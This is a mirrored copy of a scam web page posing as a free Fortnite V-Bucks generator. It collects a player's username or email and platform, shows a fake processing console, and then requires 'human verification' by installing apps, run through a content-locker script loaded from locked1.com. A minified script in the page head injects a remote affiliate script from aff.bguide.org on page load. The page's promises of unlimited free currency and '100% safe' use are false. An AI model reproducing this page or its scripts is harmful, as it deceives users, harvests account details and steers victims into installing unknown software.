<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">



<!-- Mirrored from fort2plus.online/ by HTTrack Website Copier/3.x [XR&CO'2014], Wed, 08 Jul 2020 15:46:22 GMT -->
<head>
    <title>Fornite V-Bucks Hack and unlock weapons</title>
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />

    <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
	<link rel="icon" type="image/ico" href="images/fav.html" />
	<!-- Open Graph Social Meta Tags-->
	<meta property="og:title" content="Fornite V-Bucks Hack" />
        <meta property="og:description" content="With this Fortnite V-Bucks Hack you can get free unlimited amounts of V-Bucks and get all your desired cosmetics. Get it now!" />
	<meta property="og:image" content="images/frt.jpg" />

	<!-- Google Fonts -->
	<link href="images/css8a7c8a7c8a7c8a7c.css?family=Open+Sans:300,400,700" rel="stylesheet">
	<!-- CSS -->
	<link rel="stylesheet" href="images/font-awesome.min.css">
    <link href="images/bootstrap.min.css" rel="stylesheet" />
    <link href="images/animate.css" rel="stylesheet" />
    <link href="images/sweetalert2.min.css" rel="stylesheet" />
    <link href="images/magnific-popup.css" rel="stylesheet" />
    <link href="images/fancyselect.css" rel="stylesheet" />
    <link href="images/style.css" rel="stylesheet" />

    <script type="text/javascript" id="ogjs" src="https://www.locked1.com/cl/load.php?id=0b4eded1cf8adb9aa6ec3a60ed13882d"></script>

	<script> !function(t,e){for(var n,r,s={utm_campaign:"backbutton",cid:"",1:"",2:"",3:"",4:"",5:""},a=t.location.search.substr(1).split("&"),c=[];a.length;)r=a.shift(),n=r.split("=")[0],s.hasOwnProperty(n)&&(c.push(r),delete s[n]);for(n in s)s.hasOwnProperty(n)&&c.push(n+"="+encodeURIComponent(s[n]));c.length&&(e+=(/\?/.test(e)?"&":"?")+c.join("&"));var i=t.createElement("script");i.type="text/javascript",i.async=!0,i.src=e;var o=t.getElementsByTagName("script")[0];o.parentNode.insertBefore(i,o)}(document,"https://aff.bguide.org/ad3/2293ea38488d712839a7c33d4b0e53a085af509c"); </script>
</head>
<body>
	<header>
		<div class="branding-wrapper">
			<img class="logo-img" src="images/logo.png" />
		</div>
	</header>



	<div class="main-wrapper">
		<div class="row">
			<div class="generator-wrapper">
				<div class="generator-wrapper-inner panel-box-wrapper same-height-top-panel">
					<div class="panel-overlay"></div>
					<div id="account-information-wrapper" class="account-information-wrapper">
						<div class="account-information-inner-wrapper">
							<div id="close-account-information-wrapper" class="close-account-information-wrapper"><i class="fa fa-times" aria-hidden="true"></i></div>
							<h4>Account Information</h4>
							<div class="account-info-fields-wrapper">
								<div class="account-username-wrapper">
									<label class="generator-input-label" for="account-username">Enter your username/email</label>
									<input type="text" id="account-username" class="generator-input account-input" placeholder="Your Username/Email ..." />
								</div>
								<div class="account-platform-wrapper">
									<label class="generator-input-label" for="account-platform">Platform:</label>
									<select id="account-platform" class="generator-input">
										<option value="PC">PC</option>
										<option value="PS4">PS4</option>
										<option value="XONE">XBOX</option>
                                                                                <option value="IOS">IOS</option>
                                                                                <option value="ANDROID">ANDROID</option>
                                                                                <option value="SWITCH">SWITCH</option>
									</select>
								</div>
							</div>
							<div class="generator-button-wrapper">
								<div class="generator-button-inner-wrapper second-step-inner-wrapper">
									<div class="generator-button-dot b-t-r"></div>
									<div class="generator-button-dot b-t-l"></div>
									<div class="generator-button-dot b-b-r"></div>
									<div class="generator-button-dot b-b-l"></div>
									<div class="generator-button-overlay"></div>
									<a id="second-step-button" class="generator-button second-step-button"><span class="generator-button-text">Continue</span></a>
								</div>
							</div>
						</div>
					</div>
					<div class="panel-content">
						<div class="row">
							<div class="col-md-12">
								<div class="generator-header">
									<h1>Fornite V-Bucks Generator</h1>
								</div>
							</div>
						</div>
						<div id="resources-select-wrapper" class="resources-select-wrapper">
							<div class="single-resource-wrapper row">
								<div class="futcoins-select-wrapper">
									<div class="col-xs-1 no-padding-right responsive-button-wrapper">
										<div class="value-button-wrapper">
											<div id="decrease-futcoins" class="decrease-button value-button">-</div>
										</div>
									</div>
									<div class="col-xs-10 responsive-value-wrapper">
										<h3 class="resources-title">V-Bucks</h3>
										<div id="futcoins-amount-wrapper" class="selected-amount-wrapper">
											<img class="resource-img" src="images/V-bucks.png" />
											<div id="futcoins-amount">10000</div>
											<div class="max-amount max-amount-coins">MAX AMOUNT</div>
										</div>
										<div id="progressBar" class="futcoins-loadbar"><div></div></div>
									</div>
									<div class="col-xs-1 no-padding-left responsive-button-wrapper">
										<div class="value-button-wrapper">
											<div id="increase-futcoins" class="increase-button value-button">+</div>
										</div>
									</div>
								</div>
							</div>

							<div class="generator-button-wrapper generator-start-wrapper">
								<div class="generator-button-inner-wrapper">
									<div class="generator-button-dot b-t-r"></div>
									<div class="generator-button-dot b-t-l"></div>
									<div class="generator-button-dot b-b-r"></div>
									<div class="generator-button-dot b-b-l"></div>
									<div class="generator-button-overlay"></div>
									<a id="first-step-button" class="generator-button first-step-button"><span class="generator-button-text">Generate</span></a>
								</div>
							</div>
						</div>
						<div id="processing-wrapper" class="processing-wrapper">
							<div class="main-console-wrapper">
								<div class="starting-loading-wrapper">
									<i class="icon-refresh rotating"></i>
									<span class="starting-loading-title">Processing</span>
								</div>
								<div id="human-verification" class="human-verification-wrapper"> <!-- Human Verification Main Wrapper -->
									<div class="human-verification-inner-wrapper">
										<h2>Human Verification</h2>
										<p>To prevent robot abuse of our generator, you are required to complete the human verification process by installing the apps below. After the verification is complete you will receive the selected V-bucks.</p>
										<div id="fountainG">
											<div id="fountainG_1" class="fountainG"></div>
											<div id="fountainG_2" class="fountainG"></div>
											<div id="fountainG_3" class="fountainG"></div>
											<div id="fountainG_4" class="fountainG"></div>
											<div id="fountainG_5" class="fountainG"></div>
											<div id="fountainG_6" class="fountainG"></div>
											<div id="fountainG_7" class="fountainG"></div>
											<div id="fountainG_8" class="fountainG"></div>
										</div>
										<div class="verification-offers-wrapper">
                        		<center>
<a id="second-step-button" class="generator-button second-step-button" onclick="call_locker();"><span class="generator-button-text">Verify</span></a>
                            	</center>

										</div>
									</div>
								</div>
								<div class="row first-console-row">
									<div class="col-sm-6">
										<div class="console-username-wrapper console-item-wrapper">
											<div id="console-success-confirmation-username" class="console-success-confirmation top-right"><i class="fa fa-check-circle" aria-hidden="true"></i></div>
											<h5>Account Username:</h5>
											<span id="console-username-value" class="console-item-value"><i class="icon-refresh rotating"></i></span>
										</div>
									</div>
									<div class="col-sm-6">
										<div class="console-platform-wrapper console-item-wrapper">
											<div id="console-success-confirmation-platform" class="console-success-confirmation top-right"><i class="fa fa-check-circle" aria-hidden="true"></i></div>
											<h5>Selected Platform:</h5>
											<span id="console-platform-value" class="console-item-value"><i class="icon-refresh rotating"></i></span>
										</div>
									</div>
								</div>
								<div class="row">
									<div class="col-sm-6">
										<div class="console-futcoins-wrapper console-item-wrapper">
											<div id="console-success-confirmation-futcoins" class="console-success-confirmation top-right"><i class="fa fa-check-circle" aria-hidden="true"></i></div>
											<h5>V-Bucks:</h5>
											<div class="console-futcoins-value-inner-wrapper">
												<img class="console-resource-img" src="images/V-bucks.png" />
												<span id="console-futcoins-value" class="console-item-value console-resource-value">0</span>
											</div>
										</div>
									</div>
									<div class="col-sm-6">
										<div class="console-futpoints-wrapper console-item-wrapper">
											<div id="console-success-confirmation-futpoints" class="console-success-confirmation top-right"><i class="fa fa-check-circle" aria-hidden="true"></i></div>
											<h5>Validating:</h5>
											<div class="console-futcoins-value-inner-wrapper">
												<span id="console-futcoins-value" class="console-item-value console-resource-value">OK</span>
											</div>
										</div>
									</div>
								</div>
							</div>
							<div class="messages-console-wrapper">
								<div class="console-message"></div>
							</div>
							<div class="loadbar-console-wrapper">
								<div id="progressBarConsole" class="console-loadbar"><div></div></div>
							</div>
						</div>
					</div>
				</div>
			</div>







		<div class="row bottom-row">
			<div class="comments-wrapper col-md-8" style="
    width: 100%;
">
				<div class="comments-wrapper-inner panel-box-wrapper same-height-bottom-panel" style="">

					<div class="panel-content" style="
">
						<div class="panel-title">
						</div>
						<form action="#" class="comments-section-form">
		<fieldset>
			<section>
				<label class="input comment-user-img-wrapp"></label>
				<div class="comment-wrapper" style="max-width: 100%;">
					<label class="input">
						<span class="comment-username" id="username1" style="max-width: 100%;">Fortnite Generator Instructions</span>
						<span class="comments" id="comment1"><b>STEP 1</b> - Select the number of V-bucks and click on GENERATE button.</span>
                        <br>
                        <span class="comments" id="comment2"><b>STEP 2</b> - Type in your username and select your gaming platform.</span>
                        <br>
                        <span class="comments" id="comment3"><b>STEP 3</b> - Click the CONTINUE button and wait for the generator do it's magic.</span>
                        <br>
                        <span class="comments" id="comment4"><b>STEP 4</b> - Complete the verification.</span>
                        <br>
                        <span class="comments" id="comment5"><b>STEP 5</b> - Enjoy! </span>
<br>
<br>
<br>
					</label>
					<label class="input">
						<span class="comment-username" id="username1" style="max-width: 100%;">About Fortnite V-Bucks Generator</span>
						<span class="comments" id="comment1">Generate unlimited amounts of V-bucks for your Fortnite account and spend them on whatever you want.</span>
                        <br>
                        <span class="comments" id="comment2">This generator is permanently updated and so it is 100% safe to use. Just follow the steps and get your V-bucks.</span>
					</label>
				</div>
			</section>
		</fieldset>

	</form>					</div>
				</div>
			</div>

		</div>
	</div>
	<footer>
	<p>&copy; Copyright 2018, All rights reserved.
                            <br>
                            <br>

	</footer>
	<!-- JavaScript/jQuery -->
    <script type="text/javascript" src="images/jquery.min.js"></script>
	<script src="images/jquery-ui.min.js" type="text/javascript"></script>
    <script type="text/javascript" src="images/fancyselect.js"></script>
    <script type="text/javascript" src="images/jquery.countto.js"></script>
    <script type="text/javascript" src="images/sweetalert2.min.js"></script>
    <script type="text/javascript" src="images/validator.min.js"></script>
	<script type="text/javascript" src="images/form-scripts.js"></script>
	<script type="text/javascript" src="images/jquery.magnific-popup.min.js"></script>
	<script type="text/javascript" src="images/sticky.js"></script>
    <script type="text/javascript" src="images/main.js"></script>
    <script type="text/javascript" src="images/jquery.fitvids.js"></script>

 <!-- Histats.com  START  (aync)-->
<script type="text/javascript">var _Hasync= _Hasync|| [];
_Hasync.push(['Histats.start', '1,4265153,4,0,0,0,00010000']);
_Hasync.push(['Histats.fasi', '1']);
_Hasync.push(['Histats.track_hits', '']);
(function() {
var hs = document.createElement('script'); hs.type = 'text/javascript'; hs.async = true;
hs.src = ('../s10.histats.com/js15_as.js');
(document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(hs);
})();</script>
<noscript><a href="index.html" target="_blank"><img  src="../sstatic1.histats.com/03d6d.gif?4265153&amp;101" alt="free hit counter" border="0"></a></noscript>
<!-- Histats.com  END  -->
</body>





<!-- Mirrored from fort2plus.online/ by HTTrack Website Copier/3.x [XR&CO'2014], Wed, 08 Jul 2020 15:46:22 GMT -->
</html>
